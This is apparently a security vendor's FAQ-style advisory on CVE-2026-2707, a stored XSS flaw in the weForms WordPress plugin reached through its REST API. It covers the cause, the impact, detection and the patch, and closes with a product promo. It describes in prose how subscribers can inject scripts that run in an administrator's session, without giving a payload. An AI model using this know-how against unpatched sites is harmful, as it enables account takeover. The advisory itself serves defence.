CVE-2026-2707 is a stored cross-site scripting (XSS) vulnerability in the weForms plugin for WordPress, affecting versions up to 1.6.27. It allows authenticated users with Subscriber-level access and above to inject malicious scripts into form entries via the REST API.
How does the vulnerability work?
Mechanism of the exploit
The vulnerability arises from inconsistent input sanitization between the frontend AJAX handler and the REST API endpoint. When form entries are submitted via the REST API, the input is not properly sanitized, allowing attackers to inject scripts that execute when an administrator views the entries.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the weForms plugin version 1.6.27 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the weForms plugin installed. If it is version 1.6.27 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized form submissions.
How can I fix this vulnerability?
Steps for remediation
To fix this vulnerability, update the weForms plugin to version 1.6.28 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.
What does a CVSS score of 6.4 mean?
Understanding the risk level
A CVSS score of 6.4 indicates a medium severity vulnerability. This means there is a moderate risk of exploitation, which could lead to significant consequences, such as unauthorized access or data manipulation.
What practical risks does this vulnerability pose?
Potential impact of exploitation
If exploited, this vulnerability can allow attackers to inject JavaScript that executes in the context of an administrator’s session. This could lead to session hijacking, administrative account compromise, or even a complete site takeover.
What changes were made in the patched version?
Improvements in version 1.6.28
In version 1.6.28, the sanitization process was improved by ensuring that all input values are sanitized with appropriate functions instead of just being trimmed. Additionally, Vue.js directives were changed to prevent the execution of untrusted content.
How does the proof of concept demonstrate the vulnerability?
Understanding the provided example
The proof of concept shows how an authenticated user can submit a form entry with a malicious payload that executes when an administrator views the entries. It illustrates the steps to authenticate and submit a payload, highlighting the vulnerability’s exploitability.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the weForms plugin temporarily to prevent potential exploitation. Additionally, review user roles and limit access to the REST API for lower-privileged users.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating plugins, implement security best practices such as regular backups, using a web application firewall, and monitoring for suspicious activity on your WordPress site.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found in the official CVE database, security advisories from the plugin developer, and security blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations